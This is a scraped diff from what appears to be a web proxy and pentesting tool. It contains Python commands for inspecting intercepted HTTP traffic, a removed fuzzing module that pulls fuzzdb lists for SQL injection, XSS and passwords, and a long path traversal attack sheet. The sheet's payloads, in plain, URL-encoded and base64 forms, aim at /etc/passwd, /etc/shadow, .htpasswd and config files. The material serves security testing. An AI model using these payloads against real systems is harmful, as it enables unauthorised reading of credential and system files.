# Takes in a tree and prints it at the given depth
if tree == [] or tree == [()]:
return
while tree[0] == ():
tree = tree[1:]
if tree == [] or tree == [()]:
return
if len(tree) == 1 and len(tree[0]) == 1:
print(_get_tree_prefix(depth, print_bars + [False], True) + tree[0][0])
return
curkey = tree[0][0]
subtree = []
for row in tree:
if row[0] != curkey:
if curkey == '':
curkey = '/'
print(_get_tree_prefix(depth, print_bars, False) + curkey)
if depth == 0:
_print_tree_helper(subtree, depth+1, print_bars + [False])
else:
_print_tree_helper(subtree, depth+1, print_bars + [True])
curkey = row[0]
subtree = []
subtree.append(row[1:])
if curkey == '':
curkey = '/'
print(_get_tree_prefix(depth, print_bars, True) + curkey)
_print_tree_helper(subtree, depth+1, print_bars + [False])
def add_param(found_params, kind: str, k: str, v: str, reqid: str):
if type(k) is not str:
raise Exception("BAD")
if not k in found_params:
found_params[k] = {}
if kind in found_params[k]:
found_params[k][kind].append((reqid, v))
else:
found_params[k][kind] = [(reqid, v)]
def print_param_info(param_info):
for k, d in param_info.items():
print(Styles.TABLE_HEADER + k + Colors.ENDC)
for param_type, valpairs in d.items():
print(param_type)
value_ids = {}
for reqid, val in valpairs:
ids = value_ids.get(val, [])
ids.append(reqid)
value_ids[val] = ids
for val, ids in value_ids.items():
if len(ids) <= 15:
idstr = ', '.join(ids)
else:
idstr = ', '.join(ids[:15]) + '...'
if val == '':
printstr = (Colors.RED + 'BLANK' + Colors.ENDC + 'x%d (%s)') % (len(ids), idstr)
else:
printstr = (Colors.GREEN + '%s' + Colors.ENDC + 'x%d (%s)') % (val, len(ids), idstr)
print(printstr)
print('')
def path_tuple(url):
return tuple(url.path.split('/'))
####################
## Command functions
def list_reqs(client, args):
"""
List the most recent in-context requests. By default shows the most recent 25
Usage: list [a|num]
If `a` is given, all the in-context requests are shown. If a number is given,
that many requests will be shown.
"""
if len(args) > 0:
if args[0][0].lower() == 'a':
print_count = 0
else:
try:
print_count = int(args[0])
except:
print("Please enter a valid argument for list")
return
else:
print_count = 25
rows = []
reqs = client.in_context_requests(headers_only=True, max_results=print_count)
for req in reqs:
rows.append(get_req_data_row(req, client=client))
print_request_rows(rows)
def view_full_request(client, args):
"""
View the full data of the request
Usage: view_full_request <reqid(s)>
"""
if not args:
raise CommandError("Request id is required")
reqs = load_reqlist(client, args[0])
for req in reqs:
print('-- Request id=%s --------------------' % req.db_id)
view_full_message(req, try_ws=True)
def view_full_response(client, args):
"""
View the full data of the response associated with a request
Usage: view_full_response <reqid>
"""
if not args:
raise CommandError("Request id is required")
reqs = load_reqlist(client, args[0])
for req in reqs:
if not req.response:
print("-- Request {} does not have an associated response".format(reqid))
else:
print('-- Request id=%s --------------------' % req.db_id)
view_full_message(req.response)
def view_request_headers(client, args):
"""
View the headers of the request
Usage: view_request_headers <reqid(s)>
"""
if not args:
raise CommandError("Request id is required")
reqs = load_reqlist(client, args[0], headers_only=True)
for req in reqs:
print('-- Request id=%s --------------------' % req.db_id)
view_full_message(req, headers_only=True)
def view_response_headers(client, args):
"""
View the full data of the response associated with a request
Usage: view_full_response <reqid>
"""
if not args:
raise CommandError("Request id is required")
reqs = load_reqlist(client, args[0], headers_only=True)
for req in reqs:
if not req.response:
print("-- Request {} does not have an associated response".format(reqid))
else:
print('-- Request id=%s --------------------' % req.db_id)
view_full_message(req.response, headers_only=True)
def view_request_info(client, args):
"""
View information about request
Usage: view_request_info <reqid(s)>
"""
if not args:
raise CommandError("Request id is required")
reqs = load_reqlist(client, args[0], headers_only=True)
for req in reqs:
print_request_extended(client, req)
print('')
if not args:
raise CommandError("Request id is required")
def pretty_print_request(client, args):
"""
Print the body of the request pretty printed.
Usage: pretty_print_request <format> <reqid(s)>
"""
if len(args) < 2:
raise CommandError("Usage: pretty_print_request <format> <reqid(s)>")
print_type = args[0]
reqs = load_reqlist(client, args[1])
for req in reqs:
print('-- Request id=%s --------------------' % req.db_id)
try:
pretty_print_body(print_type, req.body)
except Exception as e:
print(str(e))
def pretty_print_response(client, args):
"""
Print the body of the response pretty printed.
Usage: pretty_print_response <format> <reqid(s)>
"""
if len(args) < 2:
raise CommandError("Usage: pretty_print_request <format> <reqid(s)>")
print_type = args[0]
reqs = load_reqlist(client, args[1])
for req in reqs:
print('-- Request id=%s --------------------' % req.db_id)
if not req.response:
print("request {} does not have an associated response".format(reqid))
continue
try:
pretty_print_body(print_type, req.response.body)
except Exception as e:
print(str(e))
def print_params_cmd(client, args):
"""
View the parameters of a request
Usage: print_params <reqid(s)> [key 1] [key 2] ...
"""
if not args:
raise CommandError("Request id is required")
if len(args) > 1:
keys = args[1:]
else:
keys = None
reqs = load_reqlist(client, args[0])
for req in reqs:
print('-- Request id=%s --------------------' % req.db_id)
print_params(client, req, keys)
def get_param_info(client, args):
if len(args) == 0:
raise CommandError("Request ID(s) required")
reqs = load_reqlist(client, args[0])
args = args[1:]
if args and args[0] == 'ct':
contains = True
args = args[1:]
else:
contains = False
if args:
params = tuple(args)
else:
params = None
def check_key(k, params, contains):
if contains:
for p in params:
if p.lower() in k.lower():
return True
else:
if params is None or k in params:
return True
return False
found_params = {}
for req in reqs:
prefixed_id = client.get_reqid(req)
for k, v in req.url.param_iter():
if type(k) is not str:
raise Exception("BAD")
if check_key(k, params, contains):
add_param(found_params, 'Url Parameter', k, v, prefixed_id)
for k, v in req.param_iter():
if check_key(k, params, contains):
add_param(found_params, 'POST Parameter', k, v, prefixed_id)
for k, v in req.cookie_iter():
if check_key(k, params, contains):
add_param(found_params, 'Cookie', k, v, prefixed_id)
print_param_info(found_params)
def find_urls(client, args):
if len(args) > 0:
reqs = load_reqlist(client, args[0])
else:
reqs = client.in_context_requests_iter() # update to take reqlist
url_regexp = b'((?:http|ftp|https)://(?:[\w_-]+(?:(?:\.[\w_-]+)+))(?:[\w.,@?^=%&:/~+#-]*[\w@?^=%&/~+#-])?)'
urls = set()
for req in reqs:
urls |= set(re.findall(url_regexp, req.full_message()))
if req.response:
urls |= set(re.findall(url_regexp, req.response.full_message()))
for url in sorted(urls):
print(url.decode())
def site_map(client, args):
"""
Print the site map. Only includes requests in the current context.
Usage: site_map
"""
if len(args) > 0 and args[0] == 'p':
paths = True
else:
paths = False
all_reqs = client.in_context_requests(headers_only=True)
reqs_by_host = {}
for req in all_reqs:
reqs_by_host.setdefault(req.dest_host, []).append(req)
for host, reqs in reqs_by_host.items():
paths_set = set()
for req in reqs:
if req.response and req.response.status_code != 404:
paths_set.add(path_tuple(req.url))
tree = sorted(list(paths_set))
print(host)
if paths:
for p in tree:
print ('/'.join(list(p)))
else:
print_tree(tree)
print("")
def save_request(client, args):
if not args:
raise CommandError("Request id is required")
reqs = load_reqlist(client, args[0])
for req in reqs:
if len(args) >= 2:
fname = args[1]
else:
fname = "req_%s" % client.get_reqid(req)
with open(fname, 'wb') as f:
f.write(req.full_message())
print('Request written to {}'.format(fname))
def save_response(client, args):
if not args:
raise CommandError("Request id(s) is required")
reqs = load_reqlist(client, args[0])
for req in reqs:
if req.response:
rsp = req.response
if len(args) >= 2:
fname = args[1]
else:
fname = "rsp_%s" % client.get_reqid(req)
with open(fname, 'wb') as f:
f.write(rsp.full_message())
print('Response written to {}'.format(fname))
else:
print('Request {} does not have a response'.format(req.reqid))
def dump_response(client, args):
"""
Dump the data of the response to a file.
Usage: dump_response <id> <filename>
"""
# dump the data of a response
if not args:
raise CommandError("Request id(s) is required")
reqs = load_reqlist(client, args[0])
for req in reqs:
if req.response:
rsp = req.response
if len(args) >= 2:
fname = args[1]
else:
fname = req.url.path.split('/')[-1]
with open(fname, 'wb') as f:
f.write(rsp.body)
print('Response body written to {}'.format(fname))
else:
print('Request {} does not have a response'.format(req.reqid))
def get_surrounding_lines(s, n, lines):
left = n
right = n
lines_left = 0
lines_right = 0
# move left until we find enough lines or hit the edge
while left > 0 and lines_left < lines:
if s[left] == '\n':
lines_left += 1
left -= 1
# move right until we find enough lines or hit the edge
while right < len(s) and lines_right < lines:
if s[right] == '\n':
lines_right += 1
right += 1
return s[left:right]
def print_search_header(reqid, locstr):
printstr = Styles.TABLE_HEADER
printstr += "Result(s) for request {} ({})".format(reqid, locstr)
printstr += Colors.ENDC
print(printstr)
def highlight_str(s, substr):
highlighted = Colors.BGYELLOW + Colors.BLACK + Colors.BOLD + substr + Colors.ENDC
return s.replace(substr, highlighted)
def search_message(mes, substr, lines, reqid, locstr):
header_printed = False
for m in re.finditer(substr, mes):
if not header_printed:
print_search_header(reqid, locstr)
header_printed = True
n = m.start()
linestr = get_surrounding_lines(mes, n, lines)
linelist = linestr.split('\n')
linestr = '\n'.join(line[:500] for line in linelist)
toprint = highlight_str(linestr, substr)
print(toprint)
print('-'*50)
def search(client, args):
search_str = args[0]
lines = 2
if len(args) > 1:
lines = int(args[1])
for req in client.in_context_requests_iter():
reqid = client.get_reqid(req)
reqheader_printed = False
try:
mes = req.full_message().decode()
search_message(mes, search_str, lines, reqid, "Request")
except UnicodeDecodeError:
pass
if req.response:
try:
mes = req.response.full_message().decode()
search_message(mes, search_str, lines, reqid, "Response")
except UnicodeDecodeError:
pass
wsheader_printed = False
for wsm in req.ws_messages:
if not wsheader_printed:
print_search_header(client.get_reqid(req), reqid, "Websocket Messages")
wsheader_printed = True
if search_str in wsm.message:
print(highlight_str(wsm.message, search_str))
# @crochet.wait_for(timeout=None)
# @defer.inlineCallbacks
# def view_request_bytes(line):
# """
# View the raw bytes of the request. Use this if you want to redirect output to a file.
# Usage: view_request_bytes <reqid(s)>
# """
# args = shlex.split(line)
# if not args:
# raise CommandError("Request id is required")
# reqid = args[0]
# reqs = yield load_reqlist(reqid)
# for req in reqs:
# if len(reqs) > 1:
# print 'Request %s:' % req.reqid
# print req.full_message
# if len(reqs) > 1:
# print '-'*30
# print ''
# @crochet.wait_for(timeout=None)
# @defer.inlineCallbacks
# def view_response_bytes(line):
# """
# View the full data of the response associated with a request
# Usage: view_request_bytes <reqid(s)>
# """
# reqs = yield load_reqlist(line)
# for req in reqs:
# if req.response:
# if len(reqs) > 1:
# print '-'*15 + (' %s ' % req.reqid) + '-'*15
# print req.response.full_message
# else:
# print "Request %s does not have a response" % req.reqid
###############
## Plugin hooks
def load_cmds(cmd):
cmd.set_cmds({
'list': (list_reqs, None),
'view_full_request': (view_full_request, None),
'view_full_response': (view_full_response, None),
'view_request_headers': (view_request_headers, None),
'view_response_headers': (view_response_headers, None),
'view_request_info': (view_request_info, None),
'pretty_print_request': (pretty_print_request, None),
'pretty_print_response': (pretty_print_response, None),
'print_params': (print_params_cmd, None),
'param_info': (get_param_info, None),
'urls': (find_urls, None),
'site_map': (site_map, None),
'dump_response': (dump_response, None),
'save_request': (save_request, None),
'save_response': (save_response, None),
'search': (search, None),
# 'view_request_bytes': (view_request_bytes, None),
# 'view_response_bytes': (view_response_bytes, None),
})
cmd.add_aliases([
('list', 'ls'),
('view_full_request', 'vfq'),
('view_full_request', 'kjq'),
('view_request_headers', 'vhq'),
('view_response_headers', 'vhs'),
('view_full_response', 'vfs'),
('view_full_response', 'kjs'),
('view_request_info', 'viq'),
('pretty_print_request', 'ppq'),
('pretty_print_response', 'pps'),
('print_params', 'pprm'),
('param_info', 'pri'),
('site_map', 'sm'),
('save_request', 'savereq'),
('save_response', 'saversp'),
# ('view_request_bytes', 'vbq'),
# ('view_response_bytes', 'vbs'),
# #('dump_response', 'dr'),
])

View file

@ -1,60 +0,0 @@
import os
from .pappy import session
def from_file(fname, intro=False):
# Ignores lines until the first blank line, then returns every non-blank
# line afterwards
full_fname = os.path.join(session.config.pappy_dir, 'lists', fname)
with open(full_fname, 'r') as f:
d = f.read()
lines = d.splitlines()
# Delete until the first blank line
if intro:
while lines and lines[0] != '':
lines = lines[1:]
# Generate non-blank lines
for l in lines:
if l:
yield l
def fuzz_path_trav():
"""
Fuzz common values for path traversal.
"""
for l in from_file('path_traversal.txt', True):
yield l
def fuzz_sqli():
"""
Fuzz common values that could cause sql errors
"""
for l in from_file('fuzzdb/attack/sql-injection/detect/xplatform.fuzz.txt'):
yield l
def fuzz_xss():
"""
Fuzz values for finding XSS
"""
for l in from_file('fuzzdb/attack/xss/xss-rsnake.fuzz.txt'):
yield l
def common_passwords():
"""
List common passwords
"""
for l in from_file('fuzzdb/wordlists-user-passwd/passwds/phpbb.txt'):
yield l
def common_usernames():
"""
List common usernames
"""
for l in from_file('fuzzdb/wordlists-user-passwd/names/namelist.txt'):
yield l
def fuzz_dirs():
for l in from_file('fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-small-directories.txt'):
yield l

View file

@ -1,806 +0,0 @@
Via: http://www.vulnerability-lab.com/resources/documents/587.txt
________ .__ __ ___________ .__
\______ \ |__|______ ____ _____/ |_ ___________ ___.__. \__ ___/___________ ___ __ ___________ ___________ | |
| | \| \_ __ \_/ __ \_/ ___\ __\/ _ \_ __ < | | | | \_ __ \__ \\ \/ // __ \_ __ \/ ___/\__ \ | |
| ` \ || | \/\ ___/\ \___| | ( <_> ) | \/\___ | | | | | \// __ \\ /\ ___/| | \/\___ \ / __ \| |__
/_______ /__||__| \___ >\___ >__| \____/|__| / ____| |____| |__| (____ /\_/ \___ >__| /____ >(____ /____/
\/ \/ \/ \/ \/ \/ \/ \/
Information:
A lot of people asked us regarding our directory traversal pentest sheet for a fuzzer or own scripts. To have
some good results you can use the following list with automatic scripts, software or for manually pentesting. This
list goes out to all friends, nerds, pentester & exploiters. Please continue the List and we will update it soon.
Note: This is a technical attack sheet for directory traversal penetration tests.
/etc/master.passwd
/master.passwd
etc/passwd
etc/shadow%00
/etc/passwd
/etc/passwd%00
../etc/passwd
../etc/passwd%00
../../etc/passwd
../../etc/passwd%00
../../../etc/passwd
../../../etc/passwd%00
../../../../etc/passwd
../../../../etc/passwd%00
../../../../../etc/passwd
../../../../../etc/passwd%00
../../../../../../etc/passwd
../../../../../../etc/passwd%00
../../../../../../../etc/passwd
../../../../../../../etc/passwd%00
../../../../../../../../etc/passwd
../../../../../../../../etc/passwd%00
../../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd%00
../../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../../../../etc/shadow%00
../../../../../../etc/passwd&=%3C%3C%3C%3C
../../../administrator/inbox
../../../../../../../dev
.htpasswd
passwd
passwd.dat
pass.dat
.htpasswd
/.htpasswd
../.htpasswd
.passwd
/.passwd
../.passwd
.pass
../.pass
members/.htpasswd
member/.htpasswd
user/.htpasswd
users/.htpasswd
root/.htpasswd
db.php
data.php
database.asp
database.js
database.php
dbase.php
admin/access_log
../users.db.php
users.db.php
/core/config.php
config.php
config.js
../config.js
config.asp
../config.asp
_config.php
../_config.php
../_config.php%00
../config.php
config.inc.php
../config.inc.php
/config.asp
../config.asp
/../../../../pswd
/admin/install.php
../install.php
install.php
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow
..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd
..%2F..%2F..%2F%2F..%2F..%2Fetc/shadow
..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3NoYWRvdw==
m='../../../../../../../../etc/passwd';
/..\..\..\..\..\..\winnt\win.ini
../../windows/win.ini
..//..//..//..//..//boot.ini
..\../..\../boot.ini
..\../..\../..\../..\../boot.ini
\.....\\\.....\\\.....\\\
=3D "/.." . "%2f..
d:\AppServ\MySQL
c:\AppServ\MySQL
c:WINDOWS/system32/
/C:\Program Files\
/D:\Program Files\
/C:/inetpub/ftproot/
/boot/grub/grub.conf
/proc/interrupts
/proc/cpuinfo
/proc/meminfo
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_ log
../../../../../../../usr/local/apache/logs/access. log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_l og
../../../../../../../usr/local/apache/logs/error.l og
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache/error.log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
/etc/init.d/apache
/etc/init.d/apache2
/etc/httpd/httpd.conf
/etc/apache/apache.conf
/etc/apache/httpd.conf
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
/opt/apache/conf/httpd.conf
/home/apache/httpd.conf
/home/apache/conf/httpd.conf
/etc/apache2/sites-available/default
/etc/apache2/vhosts.d/default_vhost.include
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
2fetc2fmaster.passwd
2fmaster.passwd
etc2fpasswd
etc2fshadow%00
2fetc2fpasswd
2fetc2fpasswd%00
..2fetc2fpasswd
..2fetc2fpasswd%00
..2f..2fetc2fpasswd
..2f..2fetc2fpasswd%00
..2f..2f..2fetc2fpasswd
..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fshadow%00
2fboot2fgrub2fgrub.conf
2fproc2finterrupts
2fproc2fcpuinfo
2fproc2fmeminfo
..2fapache2flogs2ferror.log
..2fapache2flogs2faccess.log
..2f..2fapache2flogs2ferror.log
..2f..2fapache2flogs2faccess.log
..2f..2f..2fapache2flogs2ferror.log
..2f..2f..2fapache2flogs2faccess.log
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces_log
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces.log
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror_log
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror.log
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess_log
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess.log
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess_ log
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess. log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess.log
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror_log
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror.log
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror_l og
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror.l og
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror.log
2fetc2finit.d2fapache
2fetc2finit.d2fapache2
2fetc2fhttpd2fhttpd.conf
2fetc2fapache2fapache.conf
2fetc2fapache2fhttpd.conf
2fetc2fapache22fapache2.conf
2fetc2fapache22fhttpd.conf
2fusr2flocal2fapache22fconf2fhttpd.conf
2fusr2flocal2fapache2fconf2fhttpd.conf
2fopt2fapache2fconf2fhttpd.conf
2fhome2fapache2fhttpd.conf
2fhome2fapache2fconf2fhttpd.conf
2fetc2fapache22fsites-available2fdefault
2fetc2fapache22fvhosts.d2fdefault_vhost.include
2fetc2fpasswd
2fetc2fshadow
2fetc2fgroup
2fetc2fsecurity2fgroup
2fetc2fsecurity2fpasswd
2fetc2fsecurity2fuser
2fetc2fsecurity2fenviron
2fetc2fsecurity2flimits
2fusr2flib2fsecurity2fmkuser.default
L2V0Yy9tYXN0ZXIucGFzc3dk
L21hc3Rlci5wYXNzd2Q=
ZXRjL3Bhc3N3ZA==
ZXRjL3NoYWRvdyUwMA==
L2V0Yy9wYXNzd2Q=
L2V0Yy9wYXNzd2QlMDA=
Li4vZXRjL3Bhc3N3ZA==
Li4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
